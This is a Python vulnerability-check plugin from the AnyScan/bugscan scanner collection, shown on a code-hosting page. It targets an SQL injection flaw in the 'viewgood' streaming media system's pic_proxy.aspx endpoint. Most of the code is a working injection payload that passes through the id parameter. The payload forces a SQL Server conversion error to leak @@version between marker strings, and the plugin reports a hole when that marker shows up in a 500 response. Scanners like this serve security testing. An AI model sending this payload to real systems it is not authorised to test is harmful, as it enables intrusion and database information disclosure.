/AnyScanUI/AnyPoc/data/poc/bugscan/exp-2441.py

https://github.com/zhangzhenfeng/AnyScan · Python · 23 lines · 12 code · 7 blank · 4 comment · 4 complexity · 77a4933234b11801466519b156ae3d5d MD5 · raw file 

    

  1. #!/usr/bin/env python
    2. 

  2. # -*- coding: utf-8 -*-
    3. 

  3. #__Author__ = 烽火戏诸侯
    4. 

  4. #_PlugName_ = 远古流媒体系统  pic_proxy.aspx注入漏洞
    5. 

  5. 

  6. 

  7. def assign(service, arg):
    8. 

  8.     if service == "viewgood":
    9. 

  9.         return True, arg
    10. 

  10. 

  11. def audit(arg):
    12. 

  12.     payload ='viewgood/webmedia/portal/pic_proxy.aspx?id=1%20and%201%3Dconvert%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2b@@version%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29--&type=2'
    13. 

  13.     target = arg + payload 
    14. 

  14.     code, head, res, errcode, _ = curl.curl2(target)
    15. 

  15.     if code == 500 and 'tyqMicrosoft SQL Server' in res:
    16. 

  16.         security_hole(target)
    17. 

  17.            
    18. 

  18.         
    19. 

  19. 

  20. 

  21.         return arg
    22. 

  22. if __name__== '__main__':
    23. 

  23.     from dummy import *
    24.